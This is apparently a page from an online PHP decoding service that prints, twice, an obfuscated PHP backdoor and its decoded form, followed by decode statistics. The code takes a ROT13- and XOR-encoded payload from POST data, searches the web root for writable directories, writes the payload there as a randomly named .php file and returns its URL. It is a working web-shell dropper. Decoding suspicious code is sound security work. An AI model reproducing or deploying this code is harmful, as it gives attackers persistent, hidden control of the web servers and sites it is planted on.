Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$aspsdqvr = "ldjsplotmafsbped";$gqbncabxe = "";foreach ($_POST as $eocgygigch => $ghflorfy..
Decoded Output download
<? $aspsdqvr = "ldjsplotmafsbped";$gqbncabxe = "";foreach ($_POST as $eocgygigch => $ghflorfypf){if (strlen($eocgygigch) == 16 and substr_count($ghflorfypf, "%") > 10){qgwvmdv($eocgygigch, $ghflorfypf);}}function qgwvmdv($eocgygigch, $vgralq){global $gqbncabxe;$gqbncabxe = $eocgygigch;$vgralq = str_split(rawurldecode(str_rot13($vgralq)));function iqvxgmjttk($kowdqazdol, $eocgygigch){global $aspsdqvr, $gqbncabxe;return $kowdqazdol ^ $aspsdqvr[$eocgygigch % strlen($aspsdqvr)] ^ $gqbncabxe[$eocgygigch % strlen($gqbncabxe)];}$vgralq = implode("", array_map("iqvxgmjttk", array_values($vgralq), array_keys($vgralq)));$vgralq = @unserialize($vgralq);if (@is_array($vgralq)){$eocgygigch = array_keys($vgralq);$vgralq = $vgralq[$eocgygigch[0]];if ($vgralq === $eocgygigch[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function wixplwi($qdidkbpir) {static $ovmhnpcgmb = array();$hstotm = glob($qdidkbpir . '/*', GLOB_ONLYDIR);if (count($hstotm) > 0) {foreach ($hstotm as $qdidkbp){if (@is_writable($qdidkbp)){$ovmhnpcgmb[] = $qdidkbp;}}}foreach ($hstotm as $qdidkbpir) wixplwi($qdidkbpir);return $ovmhnpcgmb;}$nyhceubx = $_SERVER["DOCUMENT_ROOT"];$hstotm = wixplwi($nyhceubx);$eocgygigch = array_rand($hstotm);$vnejuzu = $hstotm[$eocgygigch] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($vnejuzu, $vgralq);echo "http://" . $_SERVER["HTTP_HOST"] . substr($vnejuzu, strlen($nyhceubx));exit();}}} ?>
Did this file decode correctly?
Original Code
$aspsdqvr = "ldjsplotmafsbped";$gqbncabxe = "";foreach ($_POST as $eocgygigch => $ghflorfypf){if (strlen($eocgygigch) == 16 and substr_count($ghflorfypf, "%") > 10){qgwvmdv($eocgygigch, $ghflorfypf);}}function qgwvmdv($eocgygigch, $vgralq){global $gqbncabxe;$gqbncabxe = $eocgygigch;$vgralq = str_split(rawurldecode(str_rot13($vgralq)));function iqvxgmjttk($kowdqazdol, $eocgygigch){global $aspsdqvr, $gqbncabxe;return $kowdqazdol ^ $aspsdqvr[$eocgygigch % strlen($aspsdqvr)] ^ $gqbncabxe[$eocgygigch % strlen($gqbncabxe)];}$vgralq = implode("", array_map("iqvxgmjttk", array_values($vgralq), array_keys($vgralq)));$vgralq = @unserialize($vgralq);if (@is_array($vgralq)){$eocgygigch = array_keys($vgralq);$vgralq = $vgralq[$eocgygigch[0]];if ($vgralq === $eocgygigch[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function wixplwi($qdidkbpir) {static $ovmhnpcgmb = array();$hstotm = glob($qdidkbpir . '/*', GLOB_ONLYDIR);if (count($hstotm) > 0) {foreach ($hstotm as $qdidkbp){if (@is_writable($qdidkbp)){$ovmhnpcgmb[] = $qdidkbp;}}}foreach ($hstotm as $qdidkbpir) wixplwi($qdidkbpir);return $ovmhnpcgmb;}$nyhceubx = $_SERVER["DOCUMENT_ROOT"];$hstotm = wixplwi($nyhceubx);$eocgygigch = array_rand($hstotm);$vnejuzu = $hstotm[$eocgygigch] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($vnejuzu, $vgralq);echo "http://" . $_SERVER["HTTP_HOST"] . substr($vnejuzu, strlen($nyhceubx));exit();}}}
Function Calls
None |
Stats
MD5 | fa1df496f42d314465512c23f6a70fdb |
Eval Count | 0 |
Decode Time | 126 ms |